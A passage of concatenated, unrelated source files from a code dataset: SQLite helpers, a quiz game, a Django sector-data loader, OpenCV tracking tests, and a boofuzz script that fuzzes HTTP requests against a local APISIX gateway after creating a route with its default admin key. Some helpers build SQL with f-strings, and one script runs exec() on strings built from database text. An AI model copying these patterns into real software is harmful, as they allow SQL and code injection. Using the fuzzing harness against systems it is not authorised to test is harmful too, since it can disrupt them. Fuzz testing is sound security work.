cursor = conn.cursor()\n cursor.execute(stmt)\n except Error as error:\n print(error)\n\n\ndef run(db_file, stmt, params=None):\n \"\"\"Run the sql statement on the database. Doesn't return anything.\"\"\"\n with create_connection(db_file) as conn:\n try:\n cursor = conn.cursor()\n if params:\n cursor.execute(stmt, params)\n else:\n cursor.execute(stmt)\n conn.commit()\n except Error as error:\n print(error)\n\n\ndef getone(db_file, stmt, params=None):\n \"\"\"Run the sql statement on the database and return the result.\"\"\"\n with create_connection(db_file) as conn:\n try:\n cursor = conn.cursor()\n if params:\n cursor.execute(stmt, params)\n else:\n cursor.execute(stmt)\n result = cursor.fetchone()\n except Error:\n result = None\n return result\n\n\ndef getall(db_file, stmt, params=None):\n \"\"\"Run the sql statement on the database and return the result.\"\"\"\n with create_connection(db_file) as conn:\n try:\n cursor = conn.cursor()\n if params:\n cursor.execute(stmt, params)\n else:\n cursor.execute(stmt)\n result = cursor.fetchall()\n except Error:\n result = None\n return result\n\n\ndef table_exists(db_file, table_name):\n \"\"\"Return true if a table exists and false if not.\"\"\"\n stmt = f\"SELECT name FROM sqlite_master WHERE type='table' AND name='{table_name}';\"\n result = getall(db_file, stmt)\n return len(result) != 0\n\n\ndef get_table_length(db_file, table):\n \"\"\"Return the number of rows in a table.\"\"\"\n stmt = f\"SELECT COUNT(*) from {table}\"\n result = getall(db_file, stmt)\n rows = result[0][0]\n return rows\n","sub_path":"beeflow/common/db/bdb.py","file_name":"bdb.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"159888904","text":"# -*- coding:utf-8 -*-\nfrom aistudio_notebook.component_drill.drill.base_drill import BaseDrill\nfrom aistudio_notebook.component_drill import drill\nimport inspect\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('-a', help='get/update', default='get', required=True)\nparser.add_argument('-c', help='code_name')\nparser.add_argument('-n', help='node_instance_id', required=True)\nparser.add_argument('-d', help='local_dir', required=True)\nparser.add_argument('-o', help='output')\nargs = parser.parse_args()\n\n\ndef 
get_engine_type(node_instance_id):\n    return node_instance_id\n\n\ndef main():\n    print(args.a)\n    print(args.c)\n    print(args.n)\n    print(args.d)\n    print(args.o)\n    code_name = args.c\n    node_instance_id = args.n\n    local_dir = args.d\n    # get the drill instance\n    drill_ = BaseDrill()\n\n    code_names = {\n        obj.code_name: obj for name, obj in inspect.getmembers(drill) if inspect.isclass(obj) and obj.code_name\n    }\n    engine_types = {\n        obj.engine_type: obj for name, obj in inspect.getmembers(drill) if inspect.isclass(obj) and obj.engine_type\n    }\n    if code_name and code_name in code_names:\n        drill_ = code_names.get(code_name)()\n    else:\n        engine_type = get_engine_type(node_instance_id=node_instance_id)\n        print('haha %s' % engine_type)\n        if engine_type and int(engine_type) in engine_types:\n            print(engine_types.get(int(engine_type))())\n            drill_ = engine_types.get(int(engine_type))()\n    print(code_names)\n    print(engine_types)\n\n    getattr(drill_, args.a)(node_instance_id=node_instance_id, local_dir=local_dir)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"aistudio_notebook/component_drill/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"52222573","text":"import json\r\nimport requests\r\nimport pprint\r\nimport html\r\nimport random\r\nansnum=1\r\nurl=\"https://opentdb.com/api.php?amount=10&category=10&difficulty=easy&type=multiple\"\r\nend=\"\"\r\nscore=0\r\n\r\nwhile end != \"quit\":\r\n    r=requests.get(url)\r\n    if (r.status_code != 200):\r\n        print(\"error in connection\")\r\n    else:\r\n\r\n        data = json.loads(r.text)\r\n        qus = data['results'][0]['question']\r\n        ans = data['results'][0]['incorrect_answers']\r\n        corr_ans = data['results'][0]['correct_answer']\r\n        ans.append(corr_ans)\r\n        random.shuffle(ans)\r\n\r\n        print(html.unescape(qus) +\"\\n\")\r\n\r\n        for ansa in ans:\r\n            print(str(ansnum) + \"-\" +html.unescape(ansa) + \"\\n\")\r\n            ansnum +=1\r\n        usrans=input(\"Type the correct answer \")\r\n        a=int(usrans)\r\n        # accept only answers in the range 1..len(ans)\r\n        if a < 1 or a > len(ans):\r\n            print(\"enter a valid number \")\r\n            continue\r\n        else:\r\n            usrans=ans[int(usrans)-1]\r\n\r\n        if usrans == corr_ans:\r\n            print(\"you answered correctly \")\r\n            ansnum=1\r\n            score +=1\r\n            print('your score is '+ str(score))\r\n        else:\r\n            print(\"sorry answer is wrong \")\r\n            ansnum=1\r\n            print('your score is '+ str(score))\r\n    end = input(\"\\n press enter to play again enter 'quit' to exit. \")\r\nprint(\"thanks for playing\") \r\n","sub_path":"quiz.py","file_name":"quiz.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"356415185","text":"import scikits.audiolab as audiolab\nimport scipy, os\nfrom google.cloud import storage\nfrom firebase import firebase\ndatabase = firebase.FirebaseApplication('https://sabrina-415a1.firebaseio.com')\nclient = storage.Client()\nbucket = client.get_bucket('sabrina-415a1.appspot.com')\nos.chdir(\"Documents/Sabrina - Diana\")\nchars = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\nresults = database.get('lang/en', None)\nfor sentence in results.values():\n    sentence = sentence.replace(\"!\", \"\").replace(\", \", \" \").replace(\". 
\", \" \").replace(\".\", \"\").lower()\n usedChars = []\n current = 0\n words = sentence.split(\" \")\n try:\n for word in words:\n exec(chars[current]+\", fs, enc = audiolab.wavread(\"+'\"'+word+'.wav\"'+\")\")\n usedChars += chars[current]\n current += 1\n exec(\"stack = scipy.vstack(\"+str(usedChars).replace(\"[\", \"(\").replace(\"]\", \")\").replace(\"'\", \"\")+\")\")\n audiolab.wavwrite(stack, sentence+\".wav\", fs, enc)\n except:\n continue\n blob = bucket.blob(sentence+\".wav\")\n blob.upload_from_filename(sentence+\".wav\")\n","sub_path":"voice.py","file_name":"voice.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"291709474","text":"import re\nfrom django.db import transaction\nfrom worlds import models\nfrom utils import traveller\n\n\n\ndef sanitize_coords(coords):\n if coords == \"\":\n return \"\"\n return (\"0000\" + str(coords))[-4:]\n\n\n\nclass PersistenceError(Exception):\n pass\n\nclass SectorMismatch(PersistenceError):\n pass\n\nclass AllegianceCache:\n def __init__(self, galaxy):\n self.cache = {}\n self.galaxy = galaxy\n for allegiance in galaxy.allegiances.all():\n self.cache[allegiance.code] = allegiance\n\n def populate(self, code, name):\n if code in self.cache:\n return None\n alleg = models.Allegiance(galaxy=self.galaxy, code=code, name=name)\n alleg.save()\n self.cache[code] = alleg\n return alleg\n\n def lookup(self, code):\n if not code:\n return None\n if code in self.cache:\n return self.cache[code]\n return self.populate(code, \"Unknown allegiance '%s'\" % code)\n\n def __str__(self):\n return str(self.cache)\n\nclass RouteTypeCache:\n def __init__(self, galaxy):\n self.cache = {}\n self.galaxy = galaxy\n for route_type in galaxy.route_types.all():\n self.cache[route_type.code] = route_type\n\n def lookup(self, code):\n if not code:\n return None\n if code in self.cache:\n return self.cache[code]\n route_type = models.RouteType(galaxy=self.galaxy, code=code)\n route_type.save()\n self.cache[code] = route_type\n return route_type\n\n def __str__(self):\n return str(self.cache)\n\nclass Loader:\n def __init__(self, galaxy, *args, **kwargs):\n if isinstance(galaxy, str):\n self.galaxy = models.Galaxy.objects.get(slug=galaxy)\n else:\n self.galaxy = galaxy\n self.cache = AllegianceCache(self.galaxy)\n self.rt_cache = RouteTypeCache(self.galaxy)\n\n @transaction.atomic\n def load_worlds(self, sector, world_data, strict=False):\n warnings = []\n ignored_codes = []\n def add_warning(msg):\n if strict:\n raise PersistenceError(msg)\n else:\n warnings.append(msg)\n if isinstance(sector, str):\n sector = models.Sector.objects.get(galaxy=self.galaxy, slug=sector)\n n_worlds = 0\n for line in world_data:\n n_worlds += 1\n coords = sanitize_coords(line['Hex'])\n line_sector = line.get('Sector')\n if line_sector and line_sector.lower() != sector.slug:\n raise SectorMismatch(\n \"World %s sector %s does not match metadata sector %s\"\n % (coords, line_sector, sector.slug)\n )\n remarks = line['Remarks'].split()\n owners = list(filter((\n lambda x: re.fullmatch(\n r'O:\\d{4}', x)\n ), remarks))\n if len(owners) > 1:\n add_warning(\"more than one owner for %s\" % coords)\n specials = list(filter((\n lambda x: re.fullmatch(\n r'A[bn]|C[psx]|Mr|Px|Re|Rs.', x)\n ), remarks))\n known_codes = list(filter((\n lambda x: re.fullmatch(\n r'Ag|As|Ba|De|Fl|Ga|He|Hi|Ic|In|Lo|Ni|Na|Po|Ri|Va|Wa', x)\n ), remarks))\n forgettable_codes = list(filter((\n lambda x: re.fullmatch(\n 
r'Pa|Di|Oc|Ph|Pi|Pr|Fr|Ho|Co|Lk|Tr|Tu|Tz|Fa|Mi|Pe|Cy|'\n r'Sa|Fo|Pz|Da', x)\n ), remarks))\n if (len(specials) + len(owners) + len(known_codes)\n + len(forgettable_codes) < len(remarks)):\n ignored_codes.append({\n \"hex\": coords,\n \"codes\": list(filter((lambda x: x not in specials\n and x not in owners and x not in known_codes\n and x not in forgettable_codes), remarks))\n })\n models.World(\n name=line['Name'],\n sector=sector,\n coords=coords,\n uwp=line['UWP'],\n bases=traveller.bases_t5_to_ct(line['Bases']),\n remarks=\" \".join(specials),\n owner=owners[0][2:] if owners else \"\",\n travel_zone=line['Zone'],\n pbg=line['PBG'],\n allegiance=self.cache.lookup(line.get('Allegiance')),\n ).save()\n return {\n \"warnings\": warnings,\n \"ignored_codes\": ignored_codes,\n \"worlds\": n_worlds,\n }\n\n @transaction.atomic\n def load_metadata(self, metadata, strict=False):\n warnings = []\n def add_warning(msg):\n if strict:\n raise PersistenceError(msg)\n else:\n warnings.append(msg)\n sector = models.Sector(\n name=metadata['Names'][0]['Text'],\n galaxy=self.galaxy,\n slug=metadata['Abbreviation'].lower(),\n x_offset=int(metadata['X']),\n y_offset=int(metadata['Y']),\n )\n sector.save()\n for subsector in metadata.get('Subsectors', []):\n models.Subsector(\n sector=sector,\n name=subsector['Name'],\n letter=subsector['Index'],\n ).save()\n n_allegiances = 0\n n_allegiances_added = 0\n for allegiance in metadata.get('Allegiances', []):\n n_allegiances += 1\n if self.cache.populate(allegiance['Code'], allegiance['Name']):\n n_allegiances_added += 1\n n_borders = 0\n for border in metadata.get('Borders', []):\n n_borders += 1\n allegiance = self.cache.lookup(border.get('Allegiance'))\n color = border.get('Color')\n if allegiance and color:\n current_color = allegiance.border_color\n if current_color:\n if current_color != color:\n add_warning(\n \"new border color %s for allegiance %s not saved\"\n % (color, allegiance.code))\n else:\n allegiance.border_color = color\n allegiance.save()\n models.Border(\n sector=sector,\n allegiance=allegiance,\n wrap_label=(border.get('WrapLabel', \"\") == \"true\"),\n show_label=not (border.get('ShowLabel', \"\") == \"false\"),\n label_position=sanitize_coords(border.get('LabelPosition', \"\")),\n label_override=border.get('Label', \"\"),\n data=border['Path'],\n ).save()\n n_routes = 0\n n_routes_added = 0\n for route in metadata.get('Routes', []):\n n_routes += 1\n allegiance = self.cache.lookup(route.get('Allegiance'))\n route_type = self.rt_cache.lookup(route.get('Type'))\n color = route.get('Color')\n if color:\n if allegiance:\n current_color = allegiance.route_color\n if current_color:\n if current_color != color:\n add_warning(\n \"new route color %s for allegiance %s not saved\"\n % (color, allegiance.code))\n else:\n allegiance.route_color = color\n allegiance.save()\n elif route_type:\n current_color = route_type.color\n if current_color:\n if current_color != color:\n add_warning(\n \"new color %s for route type %s not saved\"\n % (color, route_type.code))\n else:\n route_type.color = color\n route_type.style = route.get('Style', \"\").lower()\n route_type.save()\n start_sector = sector.offset(\n int(route.get('StartOffsetX', 0)),\n int(route.get('StartOffsetY', 0)),\n )\n end_sector = sector.offset(\n int(route.get('EndOffsetX', 0)),\n int(route.get('EndOffsetY', 0)),\n )\n if start_sector and end_sector:\n n_routes_added += 1\n models.Route(\n start_sector=start_sector,\n end_sector=end_sector,\n allegiance=allegiance,\n 
route_type=route_type,\n start_hex=sanitize_coords(route['Start']),\n end_hex=sanitize_coords(route['End']),\n ).save()\n n_labels = 0\n for label in metadata.get('Labels', []):\n n_labels += 1\n models.Label(\n sector=sector,\n coords=sanitize_coords(label['Hex']),\n color=label['Color'],\n text=label['Text'],\n ).save()\n return {\n \"sector\": sector,\n \"warnings\": warnings,\n \"allegiances\": n_allegiances,\n \"allegiances_added\": n_allegiances_added,\n \"borders\": n_borders,\n \"routes\": n_routes,\n \"routes_added\": n_routes_added,\n \"labels\": n_labels,\n }\n\n @transaction.atomic\n def load_sector(self, metadata, world_data, strict=False):\n result_1 = self.load_metadata(metadata, strict=strict)\n result_2 = self.load_worlds(result_1.pop('sector'), world_data,\n strict=strict)\n result_1['warnings'] += result_2.pop('warnings')\n result_1.update(result_2)\n return result_1\n","sub_path":"worlds/persist.py","file_name":"persist.py","file_ext":"py","file_size_in_byte":9873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571102361","text":"# -*- coding: utf-8 -*-\n\n'''\nCV_TESTS\nSHUCHEN\n\n2018.01.26\n - openCV video capturing tests\n\n2018.03.03\n - openCV Lucas-Kanade tracking\n - https://docs.opencv.org/3.3.1/d7/d8b/tutorial_py_lucas_kanade.html\n\nDONT LET YOUR DREAMS BE DREAMS!\n'''\n\n#%%\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport utilii\n\nd = '/media/shuchen/ShuData/'\nh = '/media/shuchen/HeckDrive/'\nname = 'cv_tests'\n\n#%% Lucas-Kanade tracking\nindex = 2\nfor index in [9]:#range(5):\n _,y = utilii.splitsample(utilii.getsample(index))\n yimgs = [np.repeat(np.asarray(np.squeeze(\n x.data.cpu().numpy()*255\n )[:,:,np.newaxis], dtype=np.uint8), 3, axis=2)\n for x in y['edges']]\n \n #%\n # params for ShiTomasi corner detection\n feature_params = dict( maxCorners = 100,\n qualityLevel = 0.3,\n minDistance = 7,\n blockSize = 7 )\n \n # Parameters for lucas kanade optical flow\n lk_params = dict( winSize = (15,15),\n maxLevel = 2,\n criteria = (cv2.TERM_CRITERIA_EPS | cv2.TERM_CRITERIA_COUNT, 10, 0.03))\n \n # Create some random colors\n color = np.random.randint(0,255,(100,3))\n \n # Take first frame and find corners in it\n old_frame = yimgs[0]\n old_gray = cv2.cvtColor(old_frame, cv2.COLOR_BGR2GRAY)\n p0 = cv2.goodFeaturesToTrack(old_gray, mask=None, **feature_params)\n \n # Create a mask image for drawing purposes\n mask = np.zeros_like(old_frame)\n for j in range(1, len(yimgs)):\n frame = yimgs[j]\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n # calculate optical flow\n p1, st, err = cv2.calcOpticalFlowPyrLK(old_gray, frame_gray, p0, None, **lk_params)\n \n # Select good points\n good_new = p1[st==1]\n good_old = p0[st==1]\n \n # draw the tracks\n for i,(new,old) in enumerate(zip(good_new,good_old)):\n a,b = new.ravel()\n c,d = old.ravel()\n mask = cv2.line(mask, (a,b),(c,d), color[i].tolist(), 2)\n frame = cv2.circle(frame,(a,b),5,color[i].tolist(),-1)\n img = cv2.add(frame,mask)\n \n #plt.imshow(img, cmap='gray')\n img = cv2.resize(img, dsize=(1280,720), interpolation=cv2.INTER_NEAREST)\n plt.imsave('./%s/%d.%d.png'%(name,index,j), img, format='png', cmap='gray')\n \n # Now update the previous frame and previous points\n old_gray = frame_gray.copy()\n p0 = good_new.reshape(-1,1,2)\n\n#%%\n\n\n\n\n\n\n\n\n\n\n\n\n#%% video capturing\ncap = cv2.VideoCapture(d+'shows/adventure_time_s1-5/'+\n '01.01 - Slumber Party Panic.mp4')\ncap.open(d+'shows/adventure_time_s1-5/'+\n 
'01.01 - Slumber Party Panic.mp4')\n\n#%%\nret,frame = cap.read()\nplt.imshow(frame)\n\n\n#%%\ncap = cv2.VideoCapture('/media/shuchen/ShuData/shows/attack_on_titan_s1/'+\n'[pseudo] Attack on Titan S01E01 To You, '+\n'Two Thousand Years Later [1080p] [h.265].mkv')\n\n#%%\nx = cv2.imread('/media/shuchen/ShuData/shows/attack_on_titan_s1/Sample/Screenshot 03.png')\nplt.imshow(x)\nplt.show()\n\n#%%\ncap.release()","sub_path":"cv_tests.py","file_name":"cv_tests.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312125323","text":"class Solution:\n # @param A : integer\n # @return a list of list of integers\n def solve(self, A):\n ans=[[1],[1,1],[1,2,1],[1,3,3,1],[1,4,6,4,1]]\n if A<5:\n return ans[:A]\n for i in range(A-5):\n ans.append([])\n ans[-1].append(1)\n for j in range(len(ans[-2])-1):\n ans[-1].append(ans[-2][j]+ans[-2][j+1])\n ans[-1].append(1)\n return ans\n","sub_path":"PROGRAMMING/InterviewBit/Arrays/pascal-triangle.py","file_name":"pascal-triangle.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390505873","text":"#! /usr/bin/env python\n\n#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport subprocess\nfrom public import initfuzz, run_test\nfrom boofuzz import s_block, s_delim, s_get, s_group, s_initialize, s_static, s_string\n\ndef create_route():\n command = '''curl http://127.0.0.1:9180/apisix/admin/routes/1 -H 'X-API-KEY: edd1c9f034335f136f87ad84b625c8f1' -X PUT -d '\n{\n \"uri\": \"/get*\",\n \"methods\": [\"GET\"],\n \"upstream\": {\n \"type\": \"roundrobin\",\n \"nodes\": {\n \"127.0.0.1:6666\": 1\n }\n }\n}'\n '''\n subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\ndef run():\n session = initfuzz()\n\n s_initialize(name=\"Request\")\n with s_block(\"Request-Line\"):\n s_group(\"Method\", ['GET', 'HEAD', 'POST', 'PUT', 'DELETE', 'CONNECT', 'OPTIONS', 'TRACE', \"PURGE\"])\n s_delim(\" \", name='space-1')\n s_string(\"/get\", name='Request-URI')\n s_delim(\" \", name='space-2')\n s_string('HTTP/1.1', name='HTTP-Version')\n s_static(\"\\r\\n\", name=\"Request-Line-CRLF\")\n s_string(\"Host:\", name=\"Host-Line\")\n s_delim(\" \", name=\"space-3\")\n s_string(\"example.com\", name=\"Host-Line-Value\")\n s_static(\"\\r\\n\", name=\"Host-Line-CRLF\")\n s_string(\"Connection:\", name=\"Connection-Line\")\n s_delim(\" \", name=\"space-4\")\n s_string(\"Keep-Alive\", name=\"Connection-Line-Value\")\n s_static(\"\\r\\n\", name=\"Connection-Line-CRLF\")\n s_string(\"User-Agent:\", name=\"User-Agent-Line\")\n s_delim(\" \", name=\"space-5\")\n s_string(\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 
(KHTML, like Gecko) Chrome/21.0.1180.83 Safari/537.1\", name=\"User-Agent-Line-Value\")\n s_static(\"\\r\\n\", name=\"User-Agent-Line-CRLF\")\n\n s_static(\"\\r\\n\", \"Request-CRLF\")\n session.connect(s_get(\"Request\"))\n session.fuzz(max_depth=1)\n\nif __name__ == \"__main__\":\n run_test(create_route,run)\n","sub_path":"t/fuzzing/simpleroute_test.py","file_name":"simpleroute_test.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"571395347","text":"from django.core.management.base import BaseCommand\nfrom ctrs_texts.models import (\n Repository, Manuscript, AbstractedText, EncodedText,\n AbstractedTextType, EncodedTextStatus\n)\nfrom django.utils.text import slugify\nfrom ctrs_texts.utils import get_xml_from_unicode, get_unicode_from_xml\n\n\nclass Command(BaseCommand):\n help = 'CTRS text management toolbox'\n\n def log(self, message, verbosity=1):\n if verbosity <= self.get_verbosity():\n self.stdout.write(message)\n\n def error(self, message):\n self.stderr.write(self.style.ERROR(message))\n\n def get_verbosity(self):\n return self.verbosity\n\n def add_arguments(self, parser):\n parser.add_argument('action', nargs='?', type=str)\n parser.add_argument('options', nargs='*', type=str)\n\n def handle(self, *args, **options):\n action = options['action']\n self.options = options['options']\n self.verbosity = options['verbosity']\n\n valid = False\n\n if action == 'import':\n valid = self.handle_import()\n\n if action == 'delete':\n for m in [\n Repository, Manuscript,\n AbstractedText, EncodedText, AbstractedTextType,\n EncodedTextStatus\n ]:\n m.objects.all().delete()\n valid = True\n\n if action == 'unique':\n valid = self.handle_unique()\n\n if not valid:\n self.show_help()\n else:\n self.log('done')\n\n def handle_import(self):\n '''\n curl\n \"http://localhost:8001/digipal/api/textcontentxml/?@select=*status,id,str,content,*text_content,*item_part,group,group_locus,type,*current_item,locus,shelfmark,*repository,place&@limit=1000\"\n > arch-content.json\n '''\n ret = False\n\n if len(self.options) != 1:\n return ret\n\n ret = True\n\n file_path = self.options.pop(0)\n self.action_import(file_path)\n\n return ret\n\n def action_import(self, input_file):\n data = None\n\n import json\n try:\n with open(input_file, 'rt') as fh:\n data = json.load(fh)\n except Exception as e:\n self.error('%s' % e)\n return False\n\n ret = self.import_json(data)\n\n if ret:\n ret = self.handle_unique()\n\n return ret\n\n def handle_unique(self):\n # get all versions and works\n parents = EncodedText.objects.filter(\n abstracted_text__type__slug__in=['work', 'version']\n ).exclude(\n abstracted_text__short_name__in=['HM1', 'HM2']\n ).order_by(\n 'abstracted_text__type__slug', 'abstracted_text__short_name'\n )\n\n for parent in parents:\n regions, members = parent.get_readings_from_members()\n\n encoded_texts = [\n member.encoded_texts.filter(type=parent.type).first()\n for member in members\n ]\n\n xmls = [\n get_xml_from_unicode(text.content, ishtml=True, add_root=True)\n for text in encoded_texts\n ]\n\n for ri, region in enumerate(regions):\n groups = {}\n for mi, variants in enumerate(region):\n variants['mi'] = mi\n if variants['reading'] not in groups:\n groups[variants['reading']] = []\n groups[variants['reading']].append(variants)\n\n for reading, group in groups.items():\n # print(reading, len(group))\n if len(group) != 1:\n continue\n # print('unique')\n for variant in group:\n el = 
xmls[variant['mi']].find(\n './/span[@id=\"{}\"]'.format(variant['id']))\n if el is None:\n print(\n 'WARNING: region not found ({} in {})'.format(\n ri, members[variant['mi']].short_name\n )\n )\n continue\n el.attrib['data-copies'] = '1'\n\n for mi, encoded_text in enumerate(encoded_texts):\n encoded_text.content = get_unicode_from_xml(\n xmls[mi], remove_root=True\n )\n # print(encoded_text.abstracted_text.id)\n encoded_text.save()\n\n return True\n\n def import_json(self, data):\n '''\n Imports the text XML and metadata\n from a json file exported from Archetype.\n\n Insert or update.\n Stores archetype record id in .imported_id field\n to permanently keep track of the mapping.\n '''\n ab_types = AbstractedTextType.get_or_create_default_types()\n statuses = {}\n # see delete_unimported_records()\n models_imported_ids = {m: [] for m in [\n Repository, Manuscript, AbstractedText, EncodedText\n ]}\n\n # mapping from itempart id to abstracted text id\n arch_ipid_to_ab_txt = {}\n\n for jtcxml in data['results']:\n self.log(jtcxml['str'], 2)\n jtc = jtcxml['text_content']\n jip = jtc['item_part']\n jci = jip['current_item']\n jrepo = jci['repository']\n\n if jip['type'] is None:\n continue\n ip_type = slugify(jip['type'])\n\n status_name = jtcxml['status']['str']\n status_slug = slugify(status_name)\n status = statuses.get(status_slug, None)\n if status is None:\n status, _ = EncodedTextStatus.objects.get_or_create(\n slug=status_slug,\n defaults={'name': status_name}\n )\n statuses[status_slug] = status\n\n if ip_type in ['manuscript']:\n repo, _ = Repository.update_or_create(\n jrepo['id'], jrepo['place'], jrepo['str']\n )\n models_imported_ids[Repository].append(jrepo['id'])\n ms, _ = Manuscript.update_or_create(\n jci['id'], repo, jci['shelfmark']\n )\n models_imported_ids[Manuscript].append(jci['id'])\n ab_txt, _ = AbstractedText.update_or_create(\n jip['id'], ab_types[ip_type],\n manuscript=ms, locus=jip['locus']\n )\n models_imported_ids[AbstractedText].append(jip['id'])\n else:\n ab_txt, _ = AbstractedText.update_or_create(\n jip['id'], ab_types[ip_type],\n name=jip['str'],\n )\n models_imported_ids[AbstractedText].append(jip['id'])\n\n EncodedText.update_or_create(\n jtc['id'], ab_txt, jtc['type'],\n self.clean_archetype_text_content(jtcxml['content']),\n status\n )\n models_imported_ids[EncodedText].append(jtc['id'])\n\n arch_ipid_to_ab_txt[jip['id']] = ab_txt\n\n # relationship among the abstracted texts\n # ms-text -> version-text -> work-text\n for jtcxml in data['results']:\n jtc = jtcxml['text_content']\n jip = jtc['item_part']\n ab_text = arch_ipid_to_ab_txt.get(jip['id'], None)\n if ab_text:\n ab_text_group = arch_ipid_to_ab_txt.get(\n jip.get('group__id', None), None\n )\n ab_text.group = ab_text_group\n ab_text.short_name = jip.get('group_locus', None)\n ab_text.save()\n\n deleted_count = self.delete_unimported_records(models_imported_ids)\n\n self.log('{} inserted/updated, {} deleted.'.format(\n sum([len(ids) for m, ids in models_imported_ids.items()]),\n deleted_count\n ))\n\n return True\n\n def clean_archetype_text_content(self, content):\n # non-breaking spaces -> normal spaces\n ret = (content or '').replace(' ', '').replace('\\xA0', ' ')\n\n # allow the empty symbol to be styled\n ret = ret.replace('∅', '')\n\n # ac-128: add an empty-region class the spans that only contains an\n # empty symbol\n import re\n ret = re.sub(\n r'(]+data-dpt-type=\"unsettled\"[^>]*)(>\\s*∅\\s*)',\n r'\\1 class=\"empty-region\"\\2',\n ret\n )\n\n # Minor XML transforms\n xml = 
get_xml_from_unicode(ret, ishtml=True, add_root=True)\n\n counters = {\n 'version': 0,\n 'work': 0,\n }\n\n for region in xml.findall('.//span[@data-dpt-type=\"unsettled\"]'):\n # add data-dpt-group=\"version\" to the v-regions\n region_type = 'work'\n if not region.attrib.get('data-dpt-group', None):\n region_type = 'version'\n region.attrib['data-dpt-group'] = region_type\n\n # assign short id to all regions\n counters[region_type] += 1\n region.attrib['data-rid'] = '{}-{}'.format(\n region_type[0], counters[region_type]\n )\n\n for sn in xml.findall('.//span[@data-dpt=\"sn\"]'):\n # add short if to all sentence number\n sn.attrib['data-rid'] = 's-' + str(sn.text.strip())\n\n ret = get_unicode_from_xml(xml, remove_root=True)\n\n return ret\n\n def delete_unimported_records(self, models_imported_ids):\n '''\n Delete all the records with .imported_id <> None\n which have not been imported by the import command.\n\n models_imported_ids is a dictionary of the form\n {ModelClass: [id1, id2, ...], }\n\n returns number of deleted records.\n '''\n ret = 0\n\n for m, ids in models_imported_ids.items():\n res = m.objects.exclude(imported_id__in=ids).delete()\n if res[0]:\n self.log('Deleted {} {}'.format(res[0], m), 2)\n ret += res[0]\n\n return ret\n\n def show_help(self):\n self.stdout.write('''{}\n\nUsage: ACTION OPTIONS\n\nACTION:\n\n help\n show this help.\n\n import FILE\n import all the text content and metadata from FILE.\n update if the record already exists.\n FILE: a json file obtained from archetype API,\n see inline comment (handle_import)\n\n delete\n delete all the text concent records from the DB\n\n unique\n mark up unique readings in all the texts\n\n'''.format(self.help))\n","sub_path":"ctrs_texts/management/commands/ctrstxt.py","file_name":"ctrstxt.py","file_ext":"py","file_size_in_byte":10661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"580571421","text":"\"\"\"Test SkyBell config flow.\"\"\"\nfrom unittest.mock import patch\n\nfrom aioskybell import exceptions\n\nfrom homeassistant.components.skybell.const import DOMAIN\nfrom homeassistant.config_entries import SOURCE_IMPORT, SOURCE_USER\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.data_entry_flow import FlowResultType\n\nfrom . 
import CONF_CONFIG_FLOW, _patch_skybell, _patch_skybell_devices\n\nfrom tests.common import MockConfigEntry\n\n\ndef _patch_setup_entry() -> None:\n return patch(\n \"homeassistant.components.skybell.async_setup_entry\",\n return_value=True,\n )\n\n\ndef _patch_setup() -> None:\n return patch(\n \"homeassistant.components.skybell.async_setup\",\n return_value=True,\n )\n\n\nasync def test_flow_user(hass: HomeAssistant) -> None:\n \"\"\"Test that the user step works.\"\"\"\n with _patch_skybell(), _patch_skybell_devices(), _patch_setup_entry(), _patch_setup():\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}\n )\n\n assert result[\"type\"] == FlowResultType.FORM\n assert result[\"step_id\"] == \"user\"\n\n result = await hass.config_entries.flow.async_configure(\n result[\"flow_id\"],\n user_input=CONF_CONFIG_FLOW,\n )\n\n assert result[\"type\"] == FlowResultType.CREATE_ENTRY\n assert result[\"title\"] == \"user\"\n assert result[\"data\"] == CONF_CONFIG_FLOW\n\n\nasync def test_flow_user_already_configured(hass: HomeAssistant) -> None:\n \"\"\"Test user initialized flow with duplicate server.\"\"\"\n entry = MockConfigEntry(\n domain=DOMAIN,\n data=CONF_CONFIG_FLOW,\n )\n\n entry.add_to_hass(hass)\n\n result = await hass.config_entries.flow.async_init(\n DOMAIN, context={\"source\": SOURCE_USER}, data=CONF_CONFIG_FLOW\n )\n\n assert result[\"type\"] == FlowResultType.ABORT\n assert result[\"reason\"] == 